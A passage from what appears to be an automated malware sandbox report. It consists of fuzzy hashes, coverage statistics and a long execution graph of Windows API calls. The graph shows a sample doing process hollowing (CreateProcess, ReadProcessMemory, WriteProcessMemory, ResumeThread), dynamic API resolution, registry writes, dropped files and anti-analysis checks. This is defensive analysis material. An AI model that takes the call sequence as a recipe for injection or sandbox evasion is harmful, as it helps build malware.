                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f24d1ae00189e6b09db2d4e004e1459bc1d50a5556b843e4c2dffed39cc941e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CDB69103086BC180BFF8DC01886B7DDDF565607208627F664E7600F770D5408BE4

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:9.4%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:2.8%
                                                                                                                                                                                                                                Total number of Nodes:1209
                                                                                                                                                                                                                                Total number of Limit Nodes:19
                                                                                                                                                                                                                                execution_graph 13940 153ce82 13943 1564e79 13940->13943 13951 156508f 13943->13951 13945 153ce8e 13946 1564e88 13946->13945 13954 155a4e9 13946->13954 14034 155a369 13946->14034 14114 1559f2d GetCurrentProcess TerminateProcess 13946->14114 14115 1540b01 13946->14115 14119 1565226 GetPEB 13951->14119 13953 156509b 13953->13946 13955 155a4f1 13954->13955 13955->13955 14121 1542e81 GetModuleHandleA 13955->14121 13964 155a554 14160 1556fd5 13964->14160 13965 155a53c MessageBoxA 13967 155a71a 13965->13967 14444 1540dc1 13967->14444 13971 1540df1 11 API calls 13973 155a56e 13971->13973 13974 155a5ab 13973->13974 14385 1544a31 13973->14385 13978 155a5b4 MessageBoxA 13974->13978 13979 155a5cc 13974->13979 13978->13967 14168 1556e2d 13979->14168 13983 1540df1 11 API calls 13986 155a591 13983->13986 13984 1541fc5 11 API calls 13987 155a758 13984->13987 13989 1556fd5 15 API calls 13986->13989 13990 1540dc1 11 API calls 13987->13990 13988 1540df1 11 API calls 13991 155a5f1 13988->13991 13992 155a59e 13989->13992 13993 155a765 13990->13993 14183 155703d 13991->14183 13996 1540df1 11 API calls 13992->13996 13993->13945 13996->13974 13997 1540df1 11 API calls 13998 155a613 13997->13998 13999 1556e2d 11 API calls 13998->13999 14000 155a628 13999->14000 14001 1540df1 11 API calls 14000->14001 14002 155a638 14001->14002 14003 155703d 11 API calls 14002->14003 14004 155a64d 14003->14004 14005 1540df1 11 API calls 14004->14005 14006 155a65a GetTickCount 14005->14006 14007 155a66b 14006->14007 14189 155a175 14007->14189 14018 155a6c7 14341 1557775 14018->14341 14019 155a6d3 14021 15513b1 11 API calls 14019->14021 14023 155a6e7 14021->14023 14022 155a6d1 14022->13967 14443 1559f2d GetCurrentProcess TerminateProcess 14022->14443 14024 1556cb5 11 API calls 14023->14024 14025 155a6ef 14024->14025 14027 155a6f3 14025->14027 14028 155a70b 14025->14028 14389 15574f9 14027->14389 14433 1559bed 14028->14433 14035 155a413 14034->14035 14035->14035 14036 1542e81 43 API calls 14035->14036 14037 155a502 14036->14037 14038 1556b2d 14 API calls 14037->14038 14039 155a515 14038->14039 14040 1540df1 11 API calls 14039->14040 14041 155a524 14040->14041 14042 153fbb5 22 API calls 14041->14042 14043 155a533 14042->14043 14044 155a554 14043->14044 14045 155a53c MessageBoxA 14043->14045 14046 1556fd5 15 API calls 14044->14046 14047 155a71a 14045->14047 14048 155a561 14046->14048 14049 1540dc1 11 API calls 14047->14049 14051 1540df1 11 API calls 14048->14051 14050 155a734 14049->14050 14052 1541fc5 11 API calls 14050->14052 14053 155a56e 14051->14053 14055 155a742 14052->14055 14054 155a5ab 14053->14054 14056 1544a31 11 API calls 14053->14056 14058 155a5b4 MessageBoxA 14054->14058 14059 155a5cc 14054->14059 14057 1540d9d 11 API calls 14055->14057 14060 155a584 14056->14060 14061 155a74a 14057->14061 14058->14047 14062 1556e2d 11 API calls 14059->14062 14063 1540df1 11 API calls 14060->14063 14064 1541fc5 11 API calls 14061->14064 14065 155a5e1 14062->14065 14066 155a591 14063->14066 14067 155a758 14064->14067 14068 1540df1 11 API calls 14065->14068 14069 1556fd5 15 API calls 14066->14069 14070 1540dc1 11 API calls 14067->14070 14071 155a5f1 14068->14071 14072 155a59e 14069->14072 14073 155a765 14070->14073 14074 155703d 11 API calls 14071->14074 14076 1540df1 11 API calls 14072->14076 14073->13945 14075 155a606 14074->14075 14077 1540df1 11 API calls 14075->14077 14076->14054 14078 155a613 14077->14078 14079 1556e2d 11 API calls 14078->14079 14080 155a628 14079->14080 14081 1540df1 11 API calls 14080->14081 14082 155a638 14081->14082 14083 155703d 11 API calls 14082->14083 14084 155a64d 14083->14084 14085 1540df1 11 API calls 14084->14085 14086 155a65a GetTickCount 14085->14086 14087 155a66b 14086->14087 14088 155a175 53 API calls 14087->14088 14089 155a691 14088->14089 14090 155902d 76 API calls 14089->14090 14091 155a69d 14090->14091 14092 1558719 86 API calls 14091->14092 14093 155a6a7 14092->14093 14094 15513b1 11 API calls 14093->14094 14095 155a6bb 14094->14095 14096 1556cb5 11 API calls 14095->14096 14097 155a6c3 14096->14097 14098 155a6c7 14097->14098 14099 155a6d3 14097->14099 14100 1557775 52 API calls 14098->14100 14101 15513b1 11 API calls 14099->14101 14102 155a6d1 14100->14102 14103 155a6e7 14101->14103 14102->14047 15190 1559f2d GetCurrentProcess TerminateProcess 14102->15190 14104 1556cb5 11 API calls 14103->14104 14105 155a6ef 14104->14105 14107 155a6f3 14105->14107 14108 155a70b 14105->14108 14109 15574f9 24 API calls 14107->14109 14110 1559bed 15 API calls 14108->14110 14111 155a6fb 14109->14111 14110->14102 14112 1559961 20 API calls 14111->14112 14113 155a709 14112->14113 14113->14102 14114->13945 14116 1540b34 14115->14116 15191 1540a91 14116->15191 14120 1565239 14119->14120 14120->13953 14122 1542eb4 14121->14122 14123 1540b01 42 API calls 14122->14123 14124 1542ec0 14123->14124 14125 1556b2d 14124->14125 14456 1556a91 14125->14456 14127 1556b52 14465 1556995 14127->14465 14131 1556b67 14482 1554691 14131->14482 14138 15552b5 11 API calls 14139 1556b9c 14138->14139 14140 1540df1 11 API calls 14139->14140 14141 1556ba9 14140->14141 14142 1540dc1 11 API calls 14141->14142 14143 1556bc3 14142->14143 14144 1540df1 14143->14144 14145 1540df5 14144->14145 14148 1540e05 14144->14148 14147 1540e61 11 API calls 14145->14147 14145->14148 14146 1540e33 14150 153fbb5 14146->14150 14147->14148 14148->14146 14149 153f84d 11 API calls 14148->14149 14149->14146 14151 1540d9d 11 API calls 14150->14151 14152 153fbc8 14151->14152 14153 153fbec GetCommandLineA 14152->14153 14154 153fbcc GetModuleFileNameA 14152->14154 14156 153fbf4 14153->14156 14155 1540e8d 11 API calls 14154->14155 14157 153fbea 14155->14157 14159 153fc0d 14156->14159 14593 153fa51 14156->14593 14157->14159 14159->13964 14159->13965 14161 1556fe9 14160->14161 14609 1556f35 14161->14609 14163 1557018 14166 1540d9d 11 API calls 14163->14166 14165 1540e8d 11 API calls 14165->14163 14167 155702d 14166->14167 14167->13971 14169 1556e4b 14168->14169 14170 1540e35 11 API calls 14169->14170 14171 1556e6e 14170->14171 14619 1541fb9 14171->14619 14173 1556ed2 14174 1540dc1 11 API calls 14173->14174 14176 1556f23 14174->14176 14175 1556e82 14175->14173 14177 1541fb9 11 API calls 14175->14177 14176->13988 14181 1556eaf 14177->14181 14178 1556ec5 14179 1540df1 11 API calls 14178->14179 14179->14173 14180 1541299 11 API calls 14180->14181 14181->14173 14181->14178 14181->14180 14622 15412d9 14181->14622 14184 1557055 14183->14184 14185 1540df1 11 API calls 14184->14185 14186 1557083 14185->14186 14187 15570ae 14186->14187 14648 1541291 14186->14648 14187->13997 14190 15513b1 11 API calls 14189->14190 14191 155a1a2 14190->14191 14192 1556cb5 11 API calls 14191->14192 14193 155a1aa 14192->14193 14194 155a1b3 14193->14194 14195 155a1ae 14193->14195 14197 15513b1 11 API calls 14194->14197 14662 1559f3d 14195->14662 14198 155a1c2 14197->14198 14199 1556cb5 11 API calls 14198->14199 14200 155a1ca 14199->14200 14201 15513b1 11 API calls 14200->14201 14207 155a1e5 14200->14207 14203 155a1dd 14201->14203 14205 1556cb5 11 API calls 14203->14205 14205->14207 14206 155a1f7 14209 15513b1 11 API calls 14206->14209 14207->14206 14671 1559ffd 14207->14671 14210 155a206 14209->14210 14211 1556cb5 11 API calls 14210->14211 14212 155a20e 14211->14212 14213 155a239 14212->14213 14214 15513b1 11 API calls 14212->14214 14215 15513b1 11 API calls 14213->14215 14216 155a221 14214->14216 14217 155a248 14215->14217 14654 1544479 14216->14654 14219 1556cb5 11 API calls 14217->14219 14221 155a250 14219->14221 14223 155a28d 14221->14223 14226 15513b1 11 API calls 14221->14226 14225 1540dc1 11 API calls 14223->14225 14224 155a230 14224->14213 14679 1559f2d GetCurrentProcess TerminateProcess 14224->14679 14228 155a2a7 14225->14228 14227 155a263 14226->14227 14229 1544479 42 API calls 14227->14229 14233 155902d 14228->14233 14231 155a26b 14229->14231 14231->14223 14680 1559f2d GetCurrentProcess TerminateProcess 14231->14680 14234 1559035 14233->14234 14234->14234 14235 1540e35 11 API calls 14234->14235 14236 155905a 14235->14236 14773 1544855 14236->14773 14239 155906e 14241 15513b1 11 API calls 14239->14241 14242 155907d 14241->14242 14243 1556cb5 11 API calls 14242->14243 14244 1559085 14243->14244 14245 15591e1 14244->14245 14777 15568c1 14244->14777 14247 1540dc1 11 API calls 14245->14247 14249 15591fb 14247->14249 14295 1558719 14249->14295 14251 155909d 14787 1544845 14251->14787 14254 15590bf 14256 153fbb5 22 API calls 14254->14256 14255 1544a31 11 API calls 14257 15590b4 14255->14257 14258 15590cc 14256->14258 14259 1540e35 11 API calls 14257->14259 14260 1544845 4 API calls 14258->14260 14259->14254 14261 15590d4 14260->14261 14262 15590ee 14261->14262 14263 1544a31 11 API calls 14261->14263 14790 1556bd1 14262->14790 14265 15590e3 14263->14265 14267 1540e35 11 API calls 14265->14267 14267->14262 14268 15410f9 11 API calls 14269 1559115 14268->14269 14270 1544855 GetFileAttributesA 14269->14270 14271 155911d 14270->14271 14272 1559131 14271->14272 14273 1544b6d CreateDirectoryA 14271->14273 14274 1556bd1 11 API calls 14272->14274 14276 1559129 14273->14276 14275 1559141 14274->14275 14277 15410f9 11 API calls 14275->14277 14278 15568c1 2 API calls 14276->14278 14279 1559156 14277->14279 14278->14272 14804 1558eed 14279->14804 14281 1559173 14282 153fbb5 22 API calls 14281->14282 14283 1559180 14282->14283 14284 1556fd5 15 API calls 14283->14284 14285 155918b 14284->14285 14286 1556bd1 11 API calls 14285->14286 14287 155919b 14286->14287 14288 15410f9 11 API calls 14287->14288 14289 15591b0 14288->14289 14819 1556dad 14289->14819 14292 1556fd5 15 API calls 14293 15591c6 14292->14293 14294 1556dad 15 API calls 14293->14294 14294->14245 14299 1558721 14295->14299 14296 1558943 14297 1540dc1 11 API calls 14296->14297 14298 1558964 14297->14298 14300 1540dc1 11 API calls 14298->14300 14299->14296 14301 1556e2d 11 API calls 14299->14301 14302 1558984 14300->14302 14303 1558780 14301->14303 14328 15513b1 14302->14328 14304 1540e35 11 API calls 14303->14304 14314 155879a 14304->14314 14305 15513b1 11 API calls 14305->14314 14306 1556e2d 11 API calls 14306->14314 14310 1540e35 11 API calls 14310->14314 14311 1544479 42 API calls 14311->14314 14312 1556bd1 11 API calls 14312->14314 14313 15410f9 11 API calls 14313->14314 14314->14296 14314->14305 14314->14306 14314->14310 14314->14311 14314->14312 14314->14313 14315 1556c71 GetModuleFileNameA 14314->14315 14316 1544151 11 API calls 14314->14316 14317 1556441 13 API calls 14314->14317 14318 1557639 41 API calls 14314->14318 14320 1544845 4 API calls 14314->14320 14321 1541041 11 API calls 14314->14321 14323 1556dad 15 API calls 14314->14323 14325 15588e1 14314->14325 14895 15586a9 14314->14895 14898 1556479 14314->14898 14902 15567f9 14314->14902 14919 154433d 14314->14919 14315->14314 14316->14314 14317->14314 14318->14314 14320->14314 14321->14314 14322 1556dad 15 API calls 14322->14325 14323->14314 14324 1556441 13 API calls 14324->14325 14325->14322 14325->14324 14326 1541041 11 API calls 14325->14326 14907 15566fd 14325->14907 14326->14325 14329 15513de 14328->14329 14330 1551412 14329->14330 14334 15513e4 14329->14334 14331 1540d9d 11 API calls 14330->14331 14336 1551410 14330->14336 14331->14336 14332 1540d9d 11 API calls 14333 155142f 14332->14333 14337 1556cb5 14333->14337 14335 1541299 11 API calls 14334->14335 14335->14336 14336->14332 14338 1556cc5 14337->14338 14339 1540d9d 11 API calls 14338->14339 14340 1556cfd 14339->14340 14340->14018 14340->14019 14342 155778c 14341->14342 14343 15513b1 11 API calls 14342->14343 14344 15577ae 14343->14344 14345 1544845 4 API calls 14344->14345 14346 15577b6 14345->14346 14347 15577d3 14346->14347 14348 15577ba 14346->14348 15053 1544101 14347->15053 14349 15513b1 11 API calls 14348->14349 14352 15577ce 14349->14352 14351 15577e0 14354 15577ef 14351->14354 14355 15577fe 14351->14355 14353 15513b1 11 API calls 14352->14353 14356 1557867 14353->14356 14357 1540e35 11 API calls 14354->14357 14358 15513b1 11 API calls 14355->14358 14359 1556cb5 11 API calls 14356->14359 14357->14352 14360 1557812 14358->14360 14361 155786f 14359->14361 14362 1556cb5 11 API calls 14360->14362 14363 1557873 14361->14363 14364 155788f 14361->14364 14366 155781a 14362->14366 14367 1541291 11 API calls 14363->14367 14365 1541291 11 API calls 14364->14365 14368 155789d 14365->14368 14369 155781e 14366->14369 14370 1557828 14366->14370 14371 1557881 14367->14371 14977 1557d61 14368->14977 14373 15574f9 24 API calls 14369->14373 14374 153fbb5 22 API calls 14370->14374 14375 1557d61 32 API calls 14371->14375 14373->14352 14376 1557832 14374->14376 14377 155788d 14375->14377 14378 1544845 4 API calls 14376->14378 14379 1540dc1 11 API calls 14377->14379 14380 155783a 14378->14380 14381 15578c3 14379->14381 14380->14352 14382 153fbb5 22 API calls 14380->14382 14381->14022 14383 1557848 14382->14383 14384 1544a31 11 API calls 14383->14384 14384->14352 14386 1544a44 14385->14386 14387 1541299 11 API calls 14386->14387 14388 1544a56 14387->14388 14388->13983 15131 15572cd 14389->15131 14391 1557508 14392 1544845 4 API calls 14391->14392 14393 155750f 14392->14393 14394 155751f 14393->14394 14395 1540df1 11 API calls 14393->14395 14396 1544845 4 API calls 14394->14396 14395->14394 14397 1557526 14396->14397 14398 1557548 14397->14398 14399 15572cd 20 API calls 14397->14399 14404 1559961 14398->14404 14400 1557536 14399->14400 14401 1544845 4 API calls 14400->14401 14402 155753d 14401->14402 14402->14398 15151 15574a1 14402->15151 14405 1559997 14404->14405 14406 1540e8d 11 API calls 14405->14406 14407 15599c2 GetCurrentProcessId 14406->14407 15185 1559905 14407->15185 14410 1540e35 11 API calls 14411 15599eb 14410->14411 14412 1559905 11 API calls 14411->14412 14413 1559a09 14412->14413 14414 1540e35 11 API calls 14413->14414 14415 1559a17 14414->14415 14416 1559905 11 API calls 14415->14416 14417 1559a35 14416->14417 14418 1540e35 11 API calls 14417->14418 14419 1559a43 14418->14419 14420 1559a92 CreateProcessA NtQueryInformationProcess ReadProcessMemory 14419->14420 14421 153fd1d 14420->14421 14422 1559aed ReadProcessMemory 14421->14422 14423 1559b45 14422->14423 14424 1541291 11 API calls 14423->14424 14425 1559b4e WriteProcessMemory ResumeThread Sleep GetTickCount 14424->14425 14426 1559b81 14425->14426 14427 1540dc1 11 API calls 14426->14427 14428 1559b91 14427->14428 14429 1540d9d 11 API calls 14428->14429 14430 1559b99 14429->14430 14431 1540dc1 11 API calls 14430->14431 14432 1559ba6 14431->14432 14432->14022 14434 1559c0a 14433->14434 14435 1541291 11 API calls 14434->14435 14436 1559c23 14435->14436 14437 1559c73 VirtualAlloc 14436->14437 14439 1559c96 14437->14439 14438 1559d1d LoadLibraryA 14438->14439 14439->14438 14440 1559ddb 14439->14440 14441 1559d94 GetProcAddress 14439->14441 14442 1559d7d GetProcAddress 14439->14442 14441->14439 14442->14439 14443->13967 14446 1540dc7 14444->14446 14445 1540ded 14448 1541fc5 14445->14448 14446->14445 14447 153f84d 11 API calls 14446->14447 14447->14446 14449 1541ffd 14448->14449 14450 1541fcb 14448->14450 14452 1540d9d 14449->14452 14450->14449 14451 153f84d 11 API calls 14450->14451 14451->14449 14453 1540dbe 14452->14453 14454 1540da3 14452->14454 14453->13984 14454->14453 14455 153f84d 11 API calls 14454->14455 14455->14453 14508 15568f5 14456->14508 14458 1556aa9 14459 1556aae 14458->14459 14460 1556ab9 14458->14460 14516 15569fd 14459->14516 14462 1540df1 11 API calls 14460->14462 14464 1556ac5 14462->14464 14464->14127 14466 15568f5 14 API calls 14465->14466 14467 15569ad 14466->14467 14468 1541041 14467->14468 14469 1541084 14468->14469 14470 1541045 14468->14470 14469->14131 14471 1540df1 14470->14471 14472 154104f 14470->14472 14478 1540e61 11 API calls 14471->14478 14479 1540e05 14471->14479 14473 1541062 14472->14473 14474 1541079 14472->14474 14552 1541369 14473->14552 14476 1541369 11 API calls 14474->14476 14481 1541067 14476->14481 14477 1540e33 14477->14131 14478->14479 14479->14477 14548 153f84d 14479->14548 14481->14131 14483 15546a5 14482->14483 14558 1554515 14483->14558 14486 15552b5 14487 15552d6 14486->14487 14567 1555241 14487->14567 14492 1540d9d 11 API calls 14495 1555301 14492->14495 14493 1540f85 11 API calls 14493->14495 14495->14493 14496 1555368 14495->14496 14575 15410f9 14495->14575 14497 1540dc1 11 API calls 14496->14497 14498 1555382 14497->14498 14499 1540d9d 11 API calls 14498->14499 14500 155538a 14499->14500 14501 1541299 14500->14501 14502 15412cb 14501->14502 14503 154129e 14501->14503 14504 1540d9d 11 API calls 14502->14504 14503->14502 14506 15412b2 14503->14506 14505 15412c1 14504->14505 14505->14138 14507 1540e8d 11 API calls 14506->14507 14507->14505 14509 1540d9d 11 API calls 14508->14509 14510 1556912 14509->14510 14511 1556939 RegOpenKeyExA 14510->14511 14512 1556944 14511->14512 14513 1556983 RegCloseKey 14511->14513 14514 155695d RegQueryValueExA 14512->14514 14513->14458 14514->14513 14515 155696b 14514->14515 14515->14513 14517 1556a65 14516->14517 14518 1556a21 14516->14518 14519 1540dc1 11 API calls 14517->14519 14521 1556a5b 14518->14521 14524 1541041 11 API calls 14518->14524 14525 1540f85 14518->14525 14520 1556a7f 14519->14520 14520->14127 14522 1540df1 11 API calls 14521->14522 14522->14517 14524->14518 14528 1540e8d 14525->14528 14533 1540e61 14528->14533 14530 1540e9d 14531 1540d9d 11 API calls 14530->14531 14532 1540eb5 14531->14532 14532->14518 14534 1540e65 14533->14534 14535 1540e89 14533->14535 14538 153f81d 14534->14538 14535->14530 14539 153f825 14538->14539 14540 153f83d 14538->14540 14539->14540 14542 153f971 14539->14542 14540->14530 14543 153f925 14542->14543 14544 153f94a 14543->14544 14545 1542e35 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 14543->14545 14546 153f919 7 API calls 14544->14546 14545->14544 14547 153f96c 14546->14547 14547->14540 14549 153f852 14548->14549 14550 153f865 14548->14550 14549->14550 14551 153f971 11 API calls 14549->14551 14550->14477 14551->14550 14553 1541376 14552->14553 14557 15413a6 14552->14557 14555 1540e61 11 API calls 14553->14555 14556 1541382 14553->14556 14554 1540d9d 11 API calls 14554->14556 14555->14557 14556->14481 14557->14554 14560 155453d 14558->14560 14559 1540d9d 11 API calls 14562 1554647 14559->14562 14560->14559 14560->14560 14561 1540f85 11 API calls 14561->14562 14562->14561 14563 1541041 11 API calls 14562->14563 14564 155466b 14562->14564 14563->14562 14565 1540d9d 11 API calls 14564->14565 14566 1554680 14565->14566 14566->14486 14568 1555255 14567->14568 14584 15550c5 14568->14584 14571 1540e35 14573 1540e39 14571->14573 14572 1540e5d 14572->14492 14573->14572 14574 153f84d 11 API calls 14573->14574 14574->14572 14576 154110a 14575->14576 14577 1541147 14576->14577 14578 1541130 14576->14578 14580 1540e61 11 API calls 14577->14580 14579 1541369 11 API calls 14578->14579 14581 154113d 14579->14581 14580->14581 14582 1541178 14581->14582 14583 1540df1 11 API calls 14581->14583 14583->14582 14586 15550ed 14584->14586 14585 1540d9d 11 API calls 14588 15551f7 14585->14588 14586->14585 14586->14586 14587 1540f85 11 API calls 14587->14588 14588->14587 14589 1541041 11 API calls 14588->14589 14590 155521b 14588->14590 14589->14588 14591 1540d9d 11 API calls 14590->14591 14592 1555230 14591->14592 14592->14571 14594 153fa71 14593->14594 14595 153fa67 CharNextA 14594->14595 14600 153fa92 14594->14600 14595->14594 14596 153fafe 14599 1541369 11 API calls 14596->14599 14597 153fae3 CharNextA 14597->14600 14598 153faa3 CharNextA 14598->14600 14606 153fb09 14599->14606 14600->14596 14600->14597 14600->14598 14601 153faaf CharNextA 14600->14601 14602 153fad7 CharNextA 14600->14602 14601->14600 14602->14600 14603 153fba3 14603->14156 14604 153fb74 CharNextA 14604->14606 14605 153fb24 CharNextA 14605->14606 14606->14603 14606->14604 14606->14605 14607 153fb30 CharNextA 14606->14607 14608 153fb68 CharNextA 14606->14608 14607->14606 14608->14606 14610 1556f4a 14609->14610 14611 1556f74 CreateFileA 14610->14611 14612 1556f81 GetFileSize 14611->14612 14613 1556fae 14611->14613 14614 1556f8b 14612->14614 14615 1540d9d 11 API calls 14613->14615 14616 153f81d 11 API calls 14614->14616 14617 1556fc3 14615->14617 14618 1556f92 ReadFile CloseHandle 14616->14618 14617->14163 14617->14165 14618->14613 14627 1541e0d 14619->14627 14642 1541289 14622->14642 14624 15412e7 14625 154131d 14624->14625 14626 1541369 11 API calls 14624->14626 14625->14181 14626->14625 14628 1541e30 14627->14628 14632 1541e4b 14627->14632 14629 1541e3b 14628->14629 14630 153f971 11 API calls 14628->14630 14639 1541e05 14629->14639 14630->14629 14633 1541e9b 14632->14633 14634 153f971 11 API calls 14632->14634 14635 153f81d 11 API calls 14633->14635 14637 1541ead 14633->14637 14634->14633 14635->14637 14636 1541e46 14636->14175 14637->14636 14638 1541e0d 11 API calls 14637->14638 14638->14637 14640 1541fc5 11 API calls 14639->14640 14641 1541e0a 14640->14641 14641->14636 14643 1541245 14642->14643 14644 1540e61 11 API calls 14643->14644 14646 1541280 14643->14646 14645 154125c 14644->14645 14645->14646 14647 153f84d 11 API calls 14645->14647 14646->14624 14647->14646 14649 1541245 14648->14649 14650 1540e61 11 API calls 14649->14650 14651 1541280 14649->14651 14652 154125c 14650->14652 14651->14186 14652->14651 14653 153f84d 11 API calls 14652->14653 14653->14651 14655 1544489 14654->14655 14656 15444aa 14655->14656 14681 15440bd 14655->14681 14658 15567c1 14656->14658 14659 15567d2 14658->14659 14764 15563f5 GetModuleHandleA GetProcAddress GlobalMemoryStatusEx 14659->14764 14661 15567e0 14661->14224 14663 1556a91 14 API calls 14662->14663 14664 1559f5a 14663->14664 14765 1544151 14664->14765 14666 1559f65 14667 1559f76 ExitProcess 14666->14667 14668 1559f7d 14666->14668 14669 1540dc1 11 API calls 14668->14669 14670 1559f97 14669->14670 14670->14194 14769 155685d EnumDisplayDevicesA 14671->14769 14673 155a01d 14674 1544151 11 API calls 14673->14674 14677 155a028 14674->14677 14675 1540dc1 11 API calls 14676 155a0a8 14675->14676 14676->14206 14678 1559f2d GetCurrentProcess TerminateProcess 14676->14678 14677->14675 14678->14206 14679->14213 14680->14223 14684 1547b2d 14681->14684 14683 15440d6 14683->14656 14685 1547b3b 14684->14685 14694 1542bb1 14685->14694 14687 1547b65 14700 1545131 14687->14700 14690 1540df1 11 API calls 14691 1547b7e 14690->14691 14692 1540dc1 11 API calls 14691->14692 14693 1547b98 14692->14693 14693->14683 14695 1542bc2 14694->14695 14697 1542bf3 14694->14697 14695->14697 14703 1542099 14695->14703 14697->14687 14699 1540e8d 11 API calls 14699->14697 14729 1545145 14700->14729 14704 15420ad 14703->14704 14705 15420c9 LoadStringA 14703->14705 14704->14705 14707 1542051 14704->14707 14705->14699 14708 1542061 GetModuleFileNameA 14707->14708 14709 154207d 14707->14709 14711 15422e5 GetModuleFileNameA RegOpenKeyExA 14708->14711 14709->14705 14712 1542367 14711->14712 14713 1542327 RegOpenKeyExA 14711->14713 14715 154210d 12 API calls 14712->14715 14713->14712 14714 1542345 RegOpenKeyExA 14713->14714 14714->14712 14716 15423f0 lstrcpyn GetThreadLocale GetLocaleInfoA 14714->14716 14717 154238c RegQueryValueExA 14715->14717 14718 1542520 14716->14718 14722 1542427 14716->14722 14719 15423ac RegQueryValueExA 14717->14719 14720 15423ce RegCloseKey 14717->14720 14718->14709 14719->14720 14723 15423ca 14719->14723 14720->14709 14720->14716 14721 1542437 lstrlen 14724 1542450 14721->14724 14722->14718 14722->14721 14723->14720 14724->14718 14725 154247e lstrcpyn LoadLibraryExA 14724->14725 14726 15424aa 14724->14726 14725->14726 14726->14718 14727 15424b4 lstrcpyn LoadLibraryExA 14726->14727 14727->14718 14728 15424ea lstrcpyn LoadLibraryExA 14727->14728 14728->14718 14731 154516a 14729->14731 14730 1545195 14733 15451f2 14730->14733 14740 15451ac 14730->14740 14731->14730 14742 1544d6d 14731->14742 14734 1540e8d 11 API calls 14733->14734 14735 1545140 14734->14735 14735->14690 14736 15451e7 14738 1541369 11 API calls 14736->14738 14737 1540d9d 11 API calls 14737->14740 14738->14735 14739 1541369 11 API calls 14739->14740 14740->14736 14740->14737 14740->14739 14741 1544d6d 42 API calls 14740->14741 14741->14740 14748 1544d96 14742->14748 14743 1544da7 14761 15450c4 14743->14761 14747 1544e4f 11 API calls 14747->14748 14748->14743 14748->14747 14750 1544e97 14748->14750 14758 1544d61 14748->14758 14751 1544ea8 14750->14751 14753 1544f02 14750->14753 14751->14753 14756 1544fa0 14751->14756 14752 15450c4 11 API calls 14752->14753 14753->14752 14754 15442f1 14753->14754 14755 1544ce5 42 API calls 14753->14755 14754->14748 14755->14753 14756->14754 14757 1544d3d 11 API calls 14756->14757 14757->14754 14759 1540d9d 11 API calls 14758->14759 14760 1544d6b 14759->14760 14760->14748 14762 1540d9d 11 API calls 14761->14762 14763 15450d1 14762->14763 14763->14730 14764->14661 14766 1544162 14765->14766 14767 1541369 11 API calls 14766->14767 14768 154416d 14767->14768 14768->14666 14770 155688d 14769->14770 14771 1556892 EnumDisplayDevicesA 14770->14771 14772 15568b9 14770->14772 14771->14772 14772->14673 14831 1541239 14773->14831 14776 154486a 14776->14239 14828 1544b6d 14776->14828 14778 1541239 14777->14778 14779 15568cc GetFileAttributesA 14778->14779 14780 15568ef 14779->14780 14781 15568d9 14779->14781 14783 1556c71 14780->14783 14781->14780 14782 15568e9 SetFileAttributesA 14781->14782 14782->14780 14833 153fd1d 14783->14833 14786 1556cab 14786->14251 14835 15447dd 14787->14835 14791 1556be9 14790->14791 14792 15410f9 11 API calls 14791->14792 14793 1556c17 14792->14793 14794 1554691 11 API calls 14793->14794 14795 1556c22 14794->14795 14796 15552b5 11 API calls 14795->14796 14797 1556c2d 14796->14797 14798 1541299 11 API calls 14797->14798 14799 1556c3f 14798->14799 14800 1544151 11 API calls 14799->14800 14801 1556c49 14800->14801 14802 1540dc1 11 API calls 14801->14802 14803 1556c63 14802->14803 14803->14268 14805 1556bd1 11 API calls 14804->14805 14806 1558f17 14805->14806 14807 15410f9 11 API calls 14806->14807 14808 1558f30 14807->14808 14841 1558bc9 14808->14841 14810 1558f3c 14845 1558c69 14810->14845 14815 1558f83 14815->14281 14822 1556dc2 14819->14822 14820 1556e03 14821 1540dc1 11 API calls 14820->14821 14823 1556e1d 14821->14823 14822->14820 14824 1541291 11 API calls 14822->14824 14823->14292 14825 1556def 14824->14825 14888 1556d19 14825->14888 14829 1541239 14828->14829 14830 1544b79 CreateDirectoryA 14829->14830 14830->14239 14832 154123d GetFileAttributesA 14831->14832 14832->14776 14834 153fd31 GetModuleFileNameA 14833->14834 14834->14786 14836 1541239 14835->14836 14837 15447f7 FindFirstFileA 14836->14837 14838 1544836 14837->14838 14839 1544802 FindClose 14837->14839 14838->14254 14838->14255 14839->14838 14840 1544811 FileTimeToLocalFileTime FileTimeToDosDateTime 14839->14840 14840->14838 14842 1558bcf 14841->14842 14843 1558c69 14 API calls 14842->14843 14844 1558be7 14843->14844 14844->14810 14846 1558c76 14845->14846 14847 1558c90 14845->14847 14848 1558c86 14846->14848 14849 1558c7c RegCloseKey 14846->14849 14851 1558ccd 14847->14851 14850 1558c39 13 API calls 14848->14850 14849->14848 14850->14847 14852 1540e35 11 API calls 14851->14852 14853 1558cf9 14852->14853 14854 1558d19 14853->14854 14855 15412d9 11 API calls 14853->14855 14856 1558d2a 14854->14856 14857 1558d54 14854->14857 14855->14854 14858 1558d46 RegOpenKeyExA 14856->14858 14860 1558d7a RegCreateKeyExA 14857->14860 14859 1558d86 14858->14859 14861 1558dbc 14859->14861 14862 1558daf 14859->14862 14864 15410f9 11 API calls 14859->14864 14860->14859 14863 1540d9d 11 API calls 14861->14863 14877 1558c95 14862->14877 14866 1558dd1 14863->14866 14864->14862 14866->14815 14867 1558df1 14866->14867 14868 1558e01 14867->14868 14882 1558e1d 14868->14882 14870 1558e17 14871 1558c39 14870->14871 14872 1558c65 14871->14872 14873 1558c43 14871->14873 14872->14815 14874 1558c4f RegCloseKey 14873->14874 14875 1558c49 RegFlushKey 14873->14875 14876 1540d9d 11 API calls 14874->14876 14875->14874 14876->14872 14878 1558c39 13 API calls 14877->14878 14879 1558ca5 14878->14879 14880 1540df1 11 API calls 14879->14880 14881 1558cb2 14880->14881 14881->14861 14883 1558e35 14882->14883 14884 1558e49 RegSetValueExA 14883->14884 14885 1558e57 14884->14885 14886 1558e76 14884->14886 14887 1547b2d 42 API calls 14885->14887 14886->14870 14887->14886 14890 1556d32 14888->14890 14889 1556d87 14891 1540d9d 11 API calls 14889->14891 14890->14889 14892 1556d5d CreateFileA 14890->14892 14893 1556d9c Sleep 14891->14893 14892->14889 14894 1556d6a WriteFile CloseHandle 14892->14894 14893->14820 14894->14889 14923 1558549 14895->14923 14901 155648b 14898->14901 14899 1540d9d 11 API calls 14900 15564c9 14899->14900 14900->14314 14901->14899 14903 1556809 14902->14903 14904 1556829 